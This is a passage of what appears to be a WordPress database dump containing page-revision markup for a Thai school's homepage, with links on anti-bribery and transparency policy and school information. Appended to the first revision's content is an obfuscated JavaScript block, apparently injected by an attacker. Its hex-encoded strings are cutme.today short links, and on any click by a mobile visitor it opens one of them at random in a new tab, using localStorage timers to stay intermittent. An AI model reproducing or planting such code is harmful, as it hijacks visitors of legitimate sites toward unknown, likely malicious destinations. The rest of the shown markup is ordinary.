{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"taxoPosition\":\"over_bottom_right\",\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"postsPerPage\":\"2\",\"headingText\":\"New Posts\",\"headingStyle\":\"heading4\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:12:01','2024-07-27 04:12:01','',14,'http://pakhaeng.ssk.in.th/?p=82',0,'revision','',0),
(84,1,'2024-07-27 11:15:24','2024-07-27 04:15:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 